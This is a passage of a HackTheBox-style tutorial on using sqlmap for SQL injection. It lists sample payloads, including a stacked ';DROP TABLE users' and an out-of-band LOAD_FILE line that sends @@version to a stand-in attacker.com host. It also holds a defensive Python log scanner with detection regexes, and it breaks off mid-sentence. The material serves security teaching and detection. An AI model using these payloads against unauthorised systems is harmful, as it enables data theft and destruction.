HackTheBox — SQLMap Essentials


Huy Phu

SQLMap is a common tool used to automate the detection and exploitation of SQL injection vulnerabilities.

Installation

    sudo apt install sqlmap

Confirm the installation

    python sqlmap.py

Supported Databases

SQLMap supports more DBMSes than any other SQL exploitation tool. SQLMap fully supports the following DBMSes:

Supported SQL Injection Types

SQLMap supports the following types of SQL Injection:

B: Boolean-based blind
    AND 1=1
E: Error-based
    AND GTID_SUBSET(@@version,0)
U: Union query-based
    UNION ALL SELECT 1, @@version,3
S: Stacked queries
    ;DROP TABLE users
T: Time-based blind
    AND 1=IF(2>1,SLEEP(5),0)
Q: Inline queries
    SELECT (SELECT @@version) from
Out-of-band SQL Injection
    LOAD_FILE(CONCAT('\\\\',@@version,'.attacker.com\README.txt'))
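From the defender's side, the sample payloads above can be turned into log signatures. The following is an added example, not part of the original article or of sqlmap: a heuristic access-log scanner whose regexes are built only from the payloads listed above. The log lines, the "OOB" label and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Heuristic signatures keyed by sqlmap's technique letters, built only from the
# sample payloads listed above. "OOB" is a label chosen for this example.
SIGNATURES = {
    "B": re.compile(r"\b(?:AND|OR)\s+\d+\s*=\s*\d+\b", re.I),
    "E": re.compile(r"\bGTID_SUBSET\s*\(", re.I),
    "U": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "S": re.compile(r";\s*(?:DROP|INSERT|UPDATE|DELETE)\b", re.I),
    "T": re.compile(r"\bSLEEP\s*\(", re.I),
    "Q": re.compile(r"\(\s*SELECT\b", re.I),
    "OOB": re.compile(r"\bLOAD_FILE\s*\(", re.I),
}
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return {parameter: [labels]} for query parameters matching a signature."""
    findings = {}
    for pair in urlsplit(target).query.split("&"):
        name, _, raw = pair.partition("=")
        value = unquote_plus(raw)  # decode %XX and '+' before matching
        labels = sorted(l for l, rx in SIGNATURES.items() if rx.search(value))
        if labels:
            findings[name] = labels
    return findings

def scan(lines):
    """Yield (client, target, findings) for each access-log line with a hit."""
    for line in lines:
        m = REQUEST.match(line)
        if m and (found := classify(m.group(2))):
            yield m.group(1), m.group(2), found

# Constructed access-log lines (not taken from the article).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /item?id=1 HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /search?q=salt+and+pepper HTTP/1.1" 200 640',
    '203.0.113.9 - - [01/Jan/2024:10:00:02 +0000] "GET /item?id=1%20AND%201%3D1 HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:03 +0000] "GET /item?id=1%20UNION%20ALL%20SELECT%201,%40%40version,3 HTTP/1.1" 200 530',
    '203.0.113.9 - - [01/Jan/2024:10:00:04 +0000] "GET /item?id=1%20AND%201%3DIF(2%3E1,SLEEP(5),0) HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /item?id=1;DROP%20TABLE%20users HTTP/1.1" 500 120',
    '203.0.113.9 - - [01/Jan/2024:10:00:06 +0000] "GET /item?id=1%20AND%20GTID_SUBSET(%40%40version,0) HTTP/1.1" 500 230',
]

if __name__ == "__main__":
    for client, target, found in scan(SAMPLE_LOG):
        print(client, target, found)
```

The signatures only cover GET query strings; POST bodies sent with --data do not appear in a standard access log and need application or WAF logging to inspect.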

curl command

The sqlmap command can be used like the curl command to request a page:

    sqlmap 'http://www.example.com/?id=1' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0' -H 'Accept: image/webp,*/*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Connection: keep-alive' -H 'DNT: 1'

GET/POST Requests

GET request parameters are specified in the URL, so it should be easy to use sqlmap with a GET request.

POST requests can use the --data flag to specify the parameters:

    sqlmap "https://example.com" --data "uid=1&name=test"

The above sqlmap command will test both parameters, uid and name, for vulnerability. If we only want to test the uid field, we can modify the command